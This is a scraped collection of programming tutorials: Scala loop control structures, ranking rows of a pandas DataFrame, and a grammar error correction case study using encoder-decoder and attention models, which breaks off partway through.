[ { "code": null, "e": 2089, "s": 1998, "text": "This chapter takes you through the loop control structures in Scala programming languages." }, { "code": null, "e": 2319, "s": 2089, "text": "There may be a situation, when you need to execute a block of code several number of times. In general, statements are executed sequentially: The first statement in a function is executed first, followed by the second, and so on." }, { "code": null, "e": 2425, "s": 2319, "text": "Programming languages provide various control structures that allow for more complicated execution paths." }, { "code": null, "e": 2606, "s": 2425, "text": "A loop statement allows us to execute a statement or group of statements multiple times and following is the general form of a loop statement in most of the programming languages −" }, { "code": null, "e": 2765, "s": 2606, "text": "Scala programming language provides the following types of loops to handle looping requirements. Click the following links in the table to check their detail." }, { "code": null, "e": 2776, "s": 2765, "text": "while loop" }, { "code": null, "e": 2907, "s": 2776, "text": "Repeats a statement or group of statements while a given condition is true. It tests the condition before executing the loop body." }, { "code": null, "e": 2921, "s": 2907, "text": "do-while loop" }, { "code": null, "e": 3009, "s": 2921, "text": "Like a while statement, except that it tests the condition at the end of the loop body." }, { "code": null, "e": 3018, "s": 3009, "text": "for loop" }, { "code": null, "e": 3124, "s": 3018, "text": "Executes a sequence of statements multiple times and abbreviates the code that manages the loop variable." }, { "code": null, "e": 3484, "s": 3124, "text": "Loop control statements change execution from its normal sequence. When execution leaves a scope, all automatic objects that were created in that scope are destroyed. As such Scala does not support break or continue statement like Java does but starting from Scala version 2.8, there is a way to break the loops. Click the following links to check the detail." }, { "code": null, "e": 3500, "s": 3484, "text": "break statement" }, { "code": null, "e": 3603, "s": 3500, "text": "Terminates the loop statement and transfers execution to the statement immediately following the loop." }, { "code": null, "e": 3754, "s": 3603, "text": "A loop becomes an infinite loop if a condition never becomes false. If you are using Scala, the while loop is the best way to implement infinite loop." }, { "code": null, "e": 3802, "s": 3754, "text": "The following program implements infinite loop." }, { "code": null, "e": 3979, "s": 3802, "text": "object Demo {\n def main(args: Array[String]) {\n var a = 10;\n \n // An infinite loop.\n while( true ){\n println( \"Value of a: \" + a );\n }\n }\n}" }, { "code": null, "e": 4086, "s": 3979, "text": "Save the above program in Demo.scala. The following commands are used to compile and execute this program." }, { "code": null, "e": 4120, "s": 4086, "text": "\\>scalac Demo.scala\n\\>scala Demo\n" }, { "code": null, "e": 4231, "s": 4120, "text": "If you will execute above code, it will go in infinite loop which you can terminate by pressing Ctrl + C keys." 
}, { "code": null, "e": 4309, "s": 4231, "text": "Value of a: 10\nValue of a: 10\nValue of a: 10\nValue of a: 10\n................\n" }, { "code": null, "e": 4342, "s": 4309, "text": "\n 82 Lectures \n 7 hours \n" }, { "code": null, "e": 4361, "s": 4342, "text": " Arnab Chakraborty" }, { "code": null, "e": 4396, "s": 4361, "text": "\n 23 Lectures \n 1.5 hours \n" }, { "code": null, "e": 4417, "s": 4396, "text": " Mukund Kumar Mishra" }, { "code": null, "e": 4452, "s": 4417, "text": "\n 52 Lectures \n 1.5 hours \n" }, { "code": null, "e": 4470, "s": 4452, "text": " Bigdata Engineer" }, { "code": null, "e": 4505, "s": 4470, "text": "\n 76 Lectures \n 5.5 hours \n" }, { "code": null, "e": 4523, "s": 4505, "text": " Bigdata Engineer" }, { "code": null, "e": 4558, "s": 4523, "text": "\n 69 Lectures \n 7.5 hours \n" }, { "code": null, "e": 4576, "s": 4558, "text": " Bigdata Engineer" }, { "code": null, "e": 4611, "s": 4576, "text": "\n 46 Lectures \n 4.5 hours \n" }, { "code": null, "e": 4634, "s": 4611, "text": " Stone River ELearning" }, { "code": null, "e": 4641, "s": 4634, "text": " Print" }, { "code": null, "e": 4652, "s": 4641, "text": " Add Notes" } ]
Python - Ranking Rows of Pandas DataFrame
We want to add a column that contains the ranking of each row in a given data frame; this helps us sort the data frame and determine the rank of a particular element.

Rankings are usually whole numbers, but as the example below shows, they are printed with a decimal point, which means ranks can be real numbers as well. That happens when more than one element shares the same rank in the data frame: in such cases the ranking is divided between the tied elements, so they end up with a real number as their rank.

For assigning ranks to the dataframe's elements, we use a built-in function of the pandas library, the .rank() function. We pass to it the criteria based on which we are ranking the elements, and this function returns a new column in which the ranking of each row is stored.

Code for using the .rank() function:

import pandas as pd

games = {'Name' : ['Call Of Duty', 'Total Overdose', 'GTA 3', 'Bully'],
         'Play Time(in hours)' : [45, 46, 52, 22],
         'Rate' : ['Better than Average', 'Good', 'Best', 'Average']}

df = pd.DataFrame(games)
df['ranking'] = df['Play Time(in hours)'].rank(ascending=False)
print(df)

             Name  Play Time(in hours)                 Rate  ranking
0    Call Of Duty                   45  Better than Average      3.0
1  Total Overdose                   46                 Good      2.0
2           GTA 3                   52                 Best      1.0
3           Bully                   22              Average      4.0

In this code, we are simply using the built-in .rank() function of the pandas library to rank each element present in the given data frame, using the column 'Play Time(in hours)' as the ranking criterion.

We add a column named 'ranking' to our data frame, call the .rank() function on the column by which we want to rank the elements (in this case, the 'Play Time(in hours)' column), and then print the data frame with the new column in place.

In this tutorial, we ranked the rows of a data frame and printed the result using the pandas library and its built-in functions. Ranking rows of a pandas dataframe is an easy process, but you need to follow the above method properly.
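To see the tie behaviour described above in isolation, here is a small additional sketch (hypothetical values; method='average' is the pandas default):

import pandas as pd

scores = pd.Series([50, 70, 70, 90])

# Default method='average': tied values share the mean of their positions,
# so the two 70s (positions 2 and 3) both get rank 2.5, a real number.
print(scores.rank())

# method='min' assigns both tied values the smaller rank (2.0) instead.
print(scores.rank(method='min'))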
[ { "code": null, "e": 1244, "s": 1062, "text": "To add a column that contains the ranking of each row in the provided data frame that will help us to sort a data frame and determine the rank of a particular element, for example −" }, { "code": null, "e": 1597, "s": 1244, "text": "Now, as you can see in the above example, our rankings are the whole numbers but have a decimal beside it, so that means we can have ranking in real numbers also, and that happens when more and one element have the same rank in the data frame than in such cases our ranking is divided between the elements. Hence, they have a real number as their rank." }, { "code": null, "e": 1879, "s": 1597, "text": "For assigning the rank to our dataframe’s elements, we use a built-in function of the pandas library that is the .rank() function. We pass the criteria based on which we are ranking the elements to it, and this function returns a new column in each row where the ranking is stored." }, { "code": null, "e": 1919, "s": 1879, "text": "Code for using the .rank() function is " }, { "code": null, "e": 2293, "s": 1919, "text": "import pandas as pd\ngames = {'Name' : ['Call Of Duty', 'Total Overdose', 'GTA 3', 'Bully'],\n 'Play Time(in hours)' : ['45', '46', '52', '22'],\n 'Rate' : ['Better than Average', 'Good', 'Best', 'Average']}\ndf = pd.DataFrame(games)\ndf['ranking'] = df['Play Time(in hours)'].rank(ascending = 0)\nprint(df)# Hello World program in Python\n \nprint (\"Hello World!\");" }, { "code": null, "e": 2537, "s": 2293, "text": " Name Play Time(in hours) Rate ranking\n0 Call Of Duty 45 Better than Average 3.0\n1 TotalOverdose 46 Good 2.0\n2 GTA 3 52 Best 1.0\n3 Bully 22 Average 4.0" }, { "code": null, "e": 2759, "s": 2537, "text": "In this code, we are simply using the built-in function of the panda’s library to rank each element present in the given data frame. We can use the best criteria to rank the elements with the column ‘Play Time(in hours).’" }, { "code": null, "e": 3034, "s": 2759, "text": "Now we add a column named ‘ranking’ in our data frame and use our .rank() function in it and pass the column name for which we need to do the ranking of our elements (in this case, it is Play Time(in hours) column) now when our new column is created we print our data frame." }, { "code": null, "e": 3267, "s": 3034, "text": "In this tutorial, we rank the rows in our data frame and then print our data using the pandas library and its built-in functions. Ranking rows of pandas dataframe is an easy process, but you need to follow the above method properly." } ]
Grammar Error Correction with Deep Learning | by PUSHAP GANDHI | Towards Data Science
Introduction
Problem Definition
Prerequisites
Data Source
Understanding the data
Exploratory Data Analysis
Data Preprocessing
Data Preparation and Data Pipeline
Benchmark Solution (Vanilla Encoder-Decoder Model)
Attention Mechanism
Monotonic Attention
Inference (Greedy Search VS BEAM Search)
Results and Model Comparison
Model Deployment and Predictions
Future Work
Github Repository and Linkedin
References

Grammatical Error Correction, as the name suggests, is the process by which errors in a text are detected and corrected. The problem seems easy to understand but is actually tough due to the diverse vocabulary and set of rules in a language. In addition, we are not only going to identify the mistakes, but corrections are also required.

There are immense applications for this problem, the reason being that writing is a very common means of sharing ideas and information. A model like this could help writers speed up their work with a very minimal chance of error. Moreover, there could be many individuals who are not fluent in a particular language. Therefore, these types of models make sure that language is not a barrier to communication.

Now we shall frame the task at hand as a machine learning problem. The problem that we are dealing with is a type of NLP (Natural Language Processing) problem. NLP is the field of Machine Learning which deals with the interaction between human languages and computers. I would recommend going through this paper to know the progress of approaches used to solve the problem.

The approach that we are going to look into is the Sequence to Sequence model. In short, the deep learning model is going to receive a sequence (incorrect text in this case) and it will output another sequence (corrected text in this case).

Now that we have framed our problem as a machine learning problem, there is another very integral idea that needs to be dealt with, which is the performance metric. A performance metric is a mathematical measure that helps to understand the performance of our machine learning model.

A very popular performance metric for NLP problems is the BLEU (Bilingual Evaluation Understudy) score, hence we are going to use it for our model also. You can refer to this video to know more about BLEU scores.

Before we go into the details of this case study, I assume that the readers know the concepts of Machine Learning and Deep Learning. To be specific, the ideas of LSTMs, Encoder-Decoders, and the Attention Mechanism should be familiar. I will try to provide some good references on the way.

As I mentioned above, the problem is tough to handle, and one of the reasons is the non-availability of a good quality dataset. In my research, I found some of them useful and considered the following two datasets:

Lang-8 Dataset
NUS Social Media Text Normalization and Translation Corpus

Both these datasets are publicly available if you are interested in working with them.

Lang-8 is a Japanese website that works towards language learning.
Users are able to post in the language(s) they are learning, and those posts will appear to native speakers of that language for correction. The dataset from this website has data in the following columns, separated by \t:

Number of corrections
Serial number
Sentence number (0 is the title)
Sentence written by a learner of English
Corrected sentences (if they exist)

Out of this, we have extracted input-sentence and corrected-sentence pairs for those data points for which both these sentences exist.

The NUS corpus is a dataset by the National University of Singapore (NUS) which consists of social media text data. The dataset size is 2000 data points. The data in its raw form has three rows for each datapoint:

The first row is the social media text
The second row is the correct formal English translated text
The third row is the Chinese translated data

Out of these, we can use the first two rows of each data point for our problem.

Once we have extracted the data in the required form, the next very integral step is Exploratory Data Analysis, which is an opportunity to understand and develop a good sense of the dataset. I have extracted and preprocessed the dataset into the required form, which will be discussed in the next section.
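As a rough illustration of that Lang-8 extraction step (the file name and exact column indices below are assumptions based on the column description above, not the author's actual script):

import pandas as pd

pairs = []
with open("lang8.tsv", encoding="utf-8") as f:  # hypothetical file name
    for line in f:
        cols = line.rstrip("\n").split("\t")
        # Assumed layout: three numeric columns, then the learner's
        # sentence, then the corrected sentence(s) if any exist.
        if len(cols) >= 5 and cols[4].strip():
            pairs.append((cols[3], cols[4]))

df = pd.DataFrame(pairs, columns=["input", "output"])
print(df.shape)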
We know that the data is in text format therefore all the special characters, unwanted spaces need to be removed and the decontraction of contracted words is to be done. We are also going to convert all the text into lower to reduce the complexity of the problem. The following code is followed to do all the above-mentioned operations: Following this, we can also follow some other operations is removing null values and deduplication which are available in the pandas library. Before we feed our data to the DL model it needs to be converted to a form which the machine can understand. So for this problem, we are going to use tokenization and padding to convert the dataset into a sequence of integers of the same length. While forming the data pipeline for the model we are going to pad the sequence to form the length of all the data points equal. The maximum length used for the padding is the 99th percentile of the distribution of the number of words. The data has to be converted into batches so as to input it into the deep learning model. The following code is used to form the pipeline for the dataset For the benchmark solution, I am going to the vanilla sequence to sequence model which is also known as Encoder-Decoder Model. This model takes input in a sequence form and predicts another sequence as output. Due to this, it has many applications in Machine Translation Problems. The following code is used to form Encoder-Decoder layers in the model. This is a really good blog to get an insight into the Encoder-Decoder models. I have tried many variations of Vanilla Encoder-Decoder models like using pre-trained embeddings of Word2Vec and FastText, you can check them out at my GitHub profile. After experimenting with these models, I found that for my case trainable embeddings are working better than pre-trained ones, therefore it would be used for the advanced models. The BLUE score achieved for Encoder-Decoder for our dataset is 0.4603. Attention Mechanism is a very ingenious idea in Machine Learning which clones the humanistic way of grasping information. Moreover, there are also certain disadvantages of the simple encoder-decoder model which the Attention Model overcomes. Some of the popular attention mechanism techniques used today are Bahdanau Attention Mechanism, Loung Attention Mechanism. Let me give a brief idea about the steps of the Loung Attention Mechanism which I have used extensively in my case study. To be specific this idea is known as the Global Attention Mechanism. The encoder part remains the same as the vanilla encoder-decoder, which outputs the hidden states of the input sequence. Now in the decoder part for every time step we have to compute something called a Context Vector. This context vector holds the relevant information from the encoder about the words which is to be predicted in that time step. It may sound complex but once you know how it is computed everything will fall in place. First, when we achieve all encoder hidden states(ht) and decoder previous hidden(hs) from an RNN we find the alpha values(). In the paper, Loung and others provided three alternatives for computing the score. Once the alpha values are computed the context vector is calculated as the weighted average over all the encoder hidden states with the weights being the alpha values. 
Given the target hidden state and the source side context vector simple concatenation layers if used to combine the information from both vectors to produce attention hidden state as follows: The attentional vector h ̃t is then fed through the softmax layer to produce the next word in sequence. This type of attention mechanism is called Global Attention Mechanism because all the hidden states of the encoder are considered at every time step of decoder to produce the context vector. In this case study, I have implemented Loung Attention Mechanism from scratch through Model Subclassing. Below is the code for the Attention layer for Dot type scoring. For full code, you refer to my GitHub profile. The performance metric for Attention models is significantly better than our benchmark models. BLEU ScoreDot Scoring 0.5055General Scoreing 0.5545Concat Scoreing 0.5388 Before we get into the details for Monotonic Attention let us see some drawbacks of simple attention mechanism and what was the need of monotonic attention. We know in attention mechanisms at each decoder time step all the encoder hidden states need to be referred to. This creates a quadratic time complexity which hinders its use in online settings. Therefore to overcome this disadvantage the concept of Monotonic Attention is introduced which simply says that there is no need to inspect all the attention weights at each time step. We are going to inspect the hidden states in a specific order (from left to right in English) and one of the hidden states is selected as the context vector at every time step. Once a particular entry is inspected then it will not be inspected in the next time step. The most important advantage for this approach is the linear time complexity and thus could be used for online settings. Here we are going to implement a very simple type of monotonic attention as explained in this blog and paper. This has to be kept in mind that the changes would only occur in the attention layer but the encoder and decoder layer will remain the same. These are the steps for monotonic attention: Given the previous hidden states, we are going to compute the score or energy for which we are going to use the same methods as used above in the Loung attention mechanism. After the score is computed it is converted to probabilities through with sigmoid function. The attention for the present time step is computed by this formula: Once we get the attention weights we follow the similar steps of computing the weighted sum to get the context vector and concatenate it to the hidden state of the decoder to pass through the softmax layer. In this case study, I have implemented only one variation of the monotonic attention layer. For more information refer to the blog and code by Colin Raffel where he has given the complete implementation of this layer. The performance of monotonic attention is comparable to simple attention but as mentioned in the paper it provides some advantage in the time complexity. If you know about the sequence to sequence models then you would be aware of the fact that we have to make certain changes with the model to predict the required output at the inference time. Again for that, we have two options one is known as Greedy Search and the other is Beam Search. Let us see both of them one by one. In greedy search for every time step, we consider the token with maximum probability and ignore all the remaining tokens even though they have comparable values of probabilities after the softmax layer. 
In the code, you can see the argmax function on the output of the dense softmax activation layer. This has a disadvantage because if any of the predicted words at a time step is wrong the result of future time steps will also get affected. A better way of prediction is BEAM Search in which at each time step there is a choice provided for topmost probable tokens which have numbers equal to with BEAM Width and the total score for each of the predicted sequences is equal to the product of the probabilities for each word in the sequence. For this case study, I have taken the beam width equal to 3. For more insights, you can go through this blog. For this case study, I have tried a total of 12 models with certain variations. Below are the results. The results of the attention mechanism are better than the simple encoder-decoder and among the attention model, the performance does not differ much. We can also observe that the BLEU score for beam search is better than the greedy search as expected. I have done the Model Deployment for the Monotonic Attention model which is computing the score with the dot product. You can check out the model at this link. Some of the predictions for the above model are as follows : For future work, I would love to work with other variations of the Monotonic Attention mechanism. If a better dataset is available publically that could really improve the model performance. I have tried to give a brief on the work I have done in this project. If you want to see the full detailed code where I have commented on each and every line, check out my Github repository. Feel free to connect on Linkedin. If you have reached it so far, help me to improve the content by leaving a comment. That would mean a lot to me :) https://colinraffel.com/blog/online-and-linear-time-attention-by-enforcing-monotonic-alignments.html Project under the guidance of Hina Sharma at Applied AI Course: https://www.appliedaicourse.com/course/11/Applied-Machine-learning-course Loung Attention Paper: https://arxiv.org/pdf/1508.04025.pdf Monotonic Attention Paper: https://arxiv.org/pdf/1409.0473.pdf Implementation of Monotonic Attention: https://github.com/craffel/mad/blob/b3687a70615044359c8acc440e43a5e23dc58309/example_decoder.py#L22 Blog by Rishang Prashnani
[ { "code": null, "e": 564, "s": 172, "text": "IntroductionProblem DefinitionPrerequisitesData SourceUnderstanding the dataExploratory Data AnalysisData PreprocessingData Preparation and Data PipelineBenchmark Solution(Vanilla Encoder-Decoder Model)Attention MechanismMonotonic AttentionInference (Greedy Search VS BEAM Search)Results and Model ComparisonModel Deployment and PredictionsFuture WorkGithub Repository and LinkedinReferences" }, { "code": null, "e": 577, "s": 564, "text": "Introduction" }, { "code": null, "e": 596, "s": 577, "text": "Problem Definition" }, { "code": null, "e": 610, "s": 596, "text": "Prerequisites" }, { "code": null, "e": 622, "s": 610, "text": "Data Source" }, { "code": null, "e": 645, "s": 622, "text": "Understanding the data" }, { "code": null, "e": 671, "s": 645, "text": "Exploratory Data Analysis" }, { "code": null, "e": 690, "s": 671, "text": "Data Preprocessing" }, { "code": null, "e": 725, "s": 690, "text": "Data Preparation and Data Pipeline" }, { "code": null, "e": 775, "s": 725, "text": "Benchmark Solution(Vanilla Encoder-Decoder Model)" }, { "code": null, "e": 795, "s": 775, "text": "Attention Mechanism" }, { "code": null, "e": 815, "s": 795, "text": "Monotonic Attention" }, { "code": null, "e": 856, "s": 815, "text": "Inference (Greedy Search VS BEAM Search)" }, { "code": null, "e": 885, "s": 856, "text": "Results and Model Comparison" }, { "code": null, "e": 918, "s": 885, "text": "Model Deployment and Predictions" }, { "code": null, "e": 930, "s": 918, "text": "Future Work" }, { "code": null, "e": 961, "s": 930, "text": "Github Repository and Linkedin" }, { "code": null, "e": 972, "s": 961, "text": "References" }, { "code": null, "e": 1322, "s": 972, "text": "Grammatical Error Correction as the name suggests is the process by which the detection and correction to an error in the text are done. The problem seems easy to understand but is actually tough due to the diverse vocabulary and set of rules in a language. In addition, we are not only going to identify the mistake but correction is also required." }, { "code": null, "e": 1535, "s": 1322, "text": "There are immense applications to this problem, the reason being writing is a very common means to share ideas and information. This could help the writer to speed up their work with very minimal chance of error." }, { "code": null, "e": 1714, "s": 1535, "text": "Moreover, there could be many individuals who are not fluent in a particular language. Therefore, these types of models make sure that language is not a barrier in communication." }, { "code": null, "e": 2086, "s": 1714, "text": "Now we shall define the task at hand into a machine learning problem. The problem that we are dealing is a type of NLP (Natural Language Processing) problem. NLP is the field of Machine Learning which deals with the interaction between human languages and computers. I would recommend going through this paper to know the progress of approaches used to solve the problem." }, { "code": null, "e": 2330, "s": 2086, "text": "The approach that we are going to look into is the Sequence to Sequence model. In short out, the deep learning model is going to receive a sequence (incorrect text in this case) and it will output another sequence(corrected text in this case)." }, { "code": null, "e": 2604, "s": 2330, "text": "Now we have defined our problem into a machine learning problem, there is another very integral idea that needs to be dealt with that is performance metric. 
Performance Metric is a mathematical measure that helps to understand the performance of our machine learning model." }, { "code": null, "e": 2821, "s": 2604, "text": "A very popular performance metric for the NLP problems is BLEU (Bilingual Evaluation Understudy) Score, hence we are going to use it for our model also. You can refer to this video to know more about the BLEU scores." }, { "code": null, "e": 3049, "s": 2821, "text": "Before we go into the details of this case study, I assume that the readers know the concepts for Machine Learning and Deep Learning. To be specific, the ideas of LSTMs, Encoder-Decoders, Attention Mechanism should be familiar." }, { "code": null, "e": 3104, "s": 3049, "text": "I will try to provide some good references on the way." }, { "code": null, "e": 3321, "s": 3104, "text": "As I mentioned above the problem is tough to handle to which one of the reasons is the nonavailability of a good quality dataset. In my research, I found some of them useful and considered the following two datasets." }, { "code": null, "e": 3394, "s": 3321, "text": "Lang-8 DatasetNUS Social Media Text Normalization and Translation Corpus" }, { "code": null, "e": 3409, "s": 3394, "text": "Lang-8 Dataset" }, { "code": null, "e": 3468, "s": 3409, "text": "NUS Social Media Text Normalization and Translation Corpus" }, { "code": null, "e": 3552, "s": 3468, "text": "Both these datasets are publicly available if you are interested to work with them." }, { "code": null, "e": 3836, "s": 3552, "text": "This is a Japanese website that works towards language learning. Users are able to post in the language(s) they are learning and that post will appear to native speakers of that language for correction. The dataset from this website has data in the following column separated by \\t :" }, { "code": null, "e": 3857, "s": 3836, "text": "Number of correction" }, { "code": null, "e": 3871, "s": 3857, "text": "Serial number" }, { "code": null, "e": 3887, "s": 3871, "text": "Sentence number" }, { "code": null, "e": 3902, "s": 3887, "text": "0 is the title" }, { "code": null, "e": 3943, "s": 3902, "text": "Sentence written by a learner of English" }, { "code": null, "e": 3975, "s": 3943, "text": "Corrected Sentences (If exists)" }, { "code": null, "e": 4110, "s": 3975, "text": "Out of this we have extracted input sentence and corrected sentence pairs for those data points for which both these sentences exists." }, { "code": null, "e": 4312, "s": 4110, "text": "This is the dataset by the National University of Singapore (NUS) which is social media data text data. The dataset size is 2000 data points. The data in its raw form has three rows for each datapoint." }, { "code": null, "e": 4351, "s": 4312, "text": "The first row is the social media text" }, { "code": null, "e": 4412, "s": 4351, "text": "The second row is the correct formal English translated text" }, { "code": null, "e": 4458, "s": 4412, "text": "The third row is the Chinese translated data." }, { "code": null, "e": 4538, "s": 4458, "text": "Out of these, we can use the first two rows of each data point for our problem." }, { "code": null, "e": 4733, "s": 4538, "text": "Once we have extracted the data in the required form now is a very integral step which is Exploratory Data Analysis which is an opportunity to understand and develop a good sense of the dataset." }, { "code": null, "e": 4843, "s": 4733, "text": "I have extracted and preprocessed the dataset in a required form which will be discussed in the next section." 
}, { "code": null, "e": 4992, "s": 4843, "text": "First, we will gather overall information about the dataset like the number of data points, datatypes, mean or median values of numerical data, etc." }, { "code": null, "e": 5051, "s": 4992, "text": "# TOTAL DATAPOINTSdf.shape# CHECK FOR NULL VALUESdf.info()" }, { "code": null, "e": 5120, "s": 5051, "text": "So there are around 500k data points and no null values are present." }, { "code": null, "e": 5254, "s": 5120, "text": "We have two columns in the dataset one is input and the other is output or target. Let's see one by one the analysis for each column." }, { "code": null, "e": 5386, "s": 5254, "text": "The input is a text feature we can analyze the distribution for the length of the text and the distribution of the number of words." }, { "code": null, "e": 5487, "s": 5386, "text": "The distribution for the length of characters and the number of words in the input is highly skewed." }, { "code": null, "e": 5542, "s": 5487, "text": "Both the distributions almost follow the same pattern." }, { "code": null, "e": 5636, "s": 5542, "text": "The number of characters in the input could go as high as 2000 and words are up to 400 words." }, { "code": null, "e": 5713, "s": 5636, "text": "The ratio of the higher length of words or characters is significantly less." }, { "code": null, "e": 5822, "s": 5713, "text": "More than 99 percent of inputs have a number of characters less than 200 and a number of words less than 50." }, { "code": null, "e": 5865, "s": 5822, "text": "The same is done for the output text also." }, { "code": null, "e": 5950, "s": 5865, "text": "And surprisingly the observations for the input text hold true for output text also." }, { "code": null, "e": 6049, "s": 5950, "text": "Word Cloud is a great visualization to know the most frequently occurring words in the total text." }, { "code": null, "e": 6093, "s": 6049, "text": "The most common words in both the text are:" }, { "code": null, "e": 6099, "s": 6093, "text": "think" }, { "code": null, "e": 6104, "s": 6099, "text": "want" }, { "code": null, "e": 6110, "s": 6104, "text": "today" }, { "code": null, "e": 6116, "s": 6110, "text": "Japan" }, { "code": null, "e": 6124, "s": 6116, "text": "English" }, { "code": null, "e": 6395, "s": 6124, "text": "Here wrong words are those words that are present in input but not present in target sentences and Corrected words are those that are present in target sentences but not present in input sentences. I have extracted all these words and done a word cloud analysis on them." }, { "code": null, "e": 6522, "s": 6395, "text": "After observing the incorrect and corrected words images we can observe the change in the form of the verb that is being used." }, { "code": null, "e": 6577, "s": 6522, "text": "go ==> goinggo ==> wentstudy ==> studyinguse ==> using" }, { "code": null, "e": 6739, "s": 6577, "text": "In this part of the analysis, we will associate the words with their parts of speech and plot the top 10 most occurring parts of speech. Following are the plots:" }, { "code": null, "e": 6843, "s": 6739, "text": "This shows part of speech being used a maximum number of times is Noun(NN) followed by Preposition(IN)." }, { "code": null, "e": 6998, "s": 6843, "text": "The overall numbers of parts of speech remain the same for input and output sentences but the numbers vary in NNS(Noun, plural) and PRP(personal pronouns)" }, { "code": null, "e": 7401, "s": 6998, "text": "Now we will see how to remove the unwanted data from our dataset. 
We know that the data is in text format therefore all the special characters, unwanted spaces need to be removed and the decontraction of contracted words is to be done. We are also going to convert all the text into lower to reduce the complexity of the problem. The following code is followed to do all the above-mentioned operations:" }, { "code": null, "e": 7543, "s": 7401, "text": "Following this, we can also follow some other operations is removing null values and deduplication which are available in the pandas library." }, { "code": null, "e": 7789, "s": 7543, "text": "Before we feed our data to the DL model it needs to be converted to a form which the machine can understand. So for this problem, we are going to use tokenization and padding to convert the dataset into a sequence of integers of the same length." }, { "code": null, "e": 8024, "s": 7789, "text": "While forming the data pipeline for the model we are going to pad the sequence to form the length of all the data points equal. The maximum length used for the padding is the 99th percentile of the distribution of the number of words." }, { "code": null, "e": 8178, "s": 8024, "text": "The data has to be converted into batches so as to input it into the deep learning model. The following code is used to form the pipeline for the dataset" }, { "code": null, "e": 8459, "s": 8178, "text": "For the benchmark solution, I am going to the vanilla sequence to sequence model which is also known as Encoder-Decoder Model. This model takes input in a sequence form and predicts another sequence as output. Due to this, it has many applications in Machine Translation Problems." }, { "code": null, "e": 8531, "s": 8459, "text": "The following code is used to form Encoder-Decoder layers in the model." }, { "code": null, "e": 8609, "s": 8531, "text": "This is a really good blog to get an insight into the Encoder-Decoder models." }, { "code": null, "e": 8777, "s": 8609, "text": "I have tried many variations of Vanilla Encoder-Decoder models like using pre-trained embeddings of Word2Vec and FastText, you can check them out at my GitHub profile." }, { "code": null, "e": 8956, "s": 8777, "text": "After experimenting with these models, I found that for my case trainable embeddings are working better than pre-trained ones, therefore it would be used for the advanced models." }, { "code": null, "e": 9027, "s": 8956, "text": "The BLUE score achieved for Encoder-Decoder for our dataset is 0.4603." }, { "code": null, "e": 9392, "s": 9027, "text": "Attention Mechanism is a very ingenious idea in Machine Learning which clones the humanistic way of grasping information. Moreover, there are also certain disadvantages of the simple encoder-decoder model which the Attention Model overcomes. Some of the popular attention mechanism techniques used today are Bahdanau Attention Mechanism, Loung Attention Mechanism." }, { "code": null, "e": 9583, "s": 9392, "text": "Let me give a brief idea about the steps of the Loung Attention Mechanism which I have used extensively in my case study. To be specific this idea is known as the Global Attention Mechanism." }, { "code": null, "e": 10019, "s": 9583, "text": "The encoder part remains the same as the vanilla encoder-decoder, which outputs the hidden states of the input sequence. Now in the decoder part for every time step we have to compute something called a Context Vector. This context vector holds the relevant information from the encoder about the words which is to be predicted in that time step. 
It may sound complex but once you know how it is computed everything will fall in place." }, { "code": null, "e": 10144, "s": 10019, "text": "First, when we achieve all encoder hidden states(ht) and decoder previous hidden(hs) from an RNN we find the alpha values()." }, { "code": null, "e": 10228, "s": 10144, "text": "In the paper, Loung and others provided three alternatives for computing the score." }, { "code": null, "e": 10396, "s": 10228, "text": "Once the alpha values are computed the context vector is calculated as the weighted average over all the encoder hidden states with the weights being the alpha values." }, { "code": null, "e": 10588, "s": 10396, "text": "Given the target hidden state and the source side context vector simple concatenation layers if used to combine the information from both vectors to produce attention hidden state as follows:" }, { "code": null, "e": 10692, "s": 10588, "text": "The attentional vector h ̃t is then fed through the softmax layer to produce the next word in sequence." }, { "code": null, "e": 10883, "s": 10692, "text": "This type of attention mechanism is called Global Attention Mechanism because all the hidden states of the encoder are considered at every time step of decoder to produce the context vector." }, { "code": null, "e": 11099, "s": 10883, "text": "In this case study, I have implemented Loung Attention Mechanism from scratch through Model Subclassing. Below is the code for the Attention layer for Dot type scoring. For full code, you refer to my GitHub profile." }, { "code": null, "e": 11194, "s": 11099, "text": "The performance metric for Attention models is significantly better than our benchmark models." }, { "code": null, "e": 11302, "s": 11194, "text": " BLEU ScoreDot Scoring 0.5055General Scoreing 0.5545Concat Scoreing 0.5388" }, { "code": null, "e": 11459, "s": 11302, "text": "Before we get into the details for Monotonic Attention let us see some drawbacks of simple attention mechanism and what was the need of monotonic attention." }, { "code": null, "e": 11654, "s": 11459, "text": "We know in attention mechanisms at each decoder time step all the encoder hidden states need to be referred to. This creates a quadratic time complexity which hinders its use in online settings." }, { "code": null, "e": 12106, "s": 11654, "text": "Therefore to overcome this disadvantage the concept of Monotonic Attention is introduced which simply says that there is no need to inspect all the attention weights at each time step. We are going to inspect the hidden states in a specific order (from left to right in English) and one of the hidden states is selected as the context vector at every time step. Once a particular entry is inspected then it will not be inspected in the next time step." }, { "code": null, "e": 12227, "s": 12106, "text": "The most important advantage for this approach is the linear time complexity and thus could be used for online settings." }, { "code": null, "e": 12523, "s": 12227, "text": "Here we are going to implement a very simple type of monotonic attention as explained in this blog and paper. This has to be kept in mind that the changes would only occur in the attention layer but the encoder and decoder layer will remain the same. These are the steps for monotonic attention:" }, { "code": null, "e": 12696, "s": 12523, "text": "Given the previous hidden states, we are going to compute the score or energy for which we are going to use the same methods as used above in the Loung attention mechanism." 
}, { "code": null, "e": 12788, "s": 12696, "text": "After the score is computed it is converted to probabilities through with sigmoid function." }, { "code": null, "e": 12857, "s": 12788, "text": "The attention for the present time step is computed by this formula:" }, { "code": null, "e": 13064, "s": 12857, "text": "Once we get the attention weights we follow the similar steps of computing the weighted sum to get the context vector and concatenate it to the hidden state of the decoder to pass through the softmax layer." }, { "code": null, "e": 13282, "s": 13064, "text": "In this case study, I have implemented only one variation of the monotonic attention layer. For more information refer to the blog and code by Colin Raffel where he has given the complete implementation of this layer." }, { "code": null, "e": 13436, "s": 13282, "text": "The performance of monotonic attention is comparable to simple attention but as mentioned in the paper it provides some advantage in the time complexity." }, { "code": null, "e": 13628, "s": 13436, "text": "If you know about the sequence to sequence models then you would be aware of the fact that we have to make certain changes with the model to predict the required output at the inference time." }, { "code": null, "e": 13760, "s": 13628, "text": "Again for that, we have two options one is known as Greedy Search and the other is Beam Search. Let us see both of them one by one." }, { "code": null, "e": 13963, "s": 13760, "text": "In greedy search for every time step, we consider the token with maximum probability and ignore all the remaining tokens even though they have comparable values of probabilities after the softmax layer." }, { "code": null, "e": 14061, "s": 13963, "text": "In the code, you can see the argmax function on the output of the dense softmax activation layer." }, { "code": null, "e": 14203, "s": 14061, "text": "This has a disadvantage because if any of the predicted words at a time step is wrong the result of future time steps will also get affected." }, { "code": 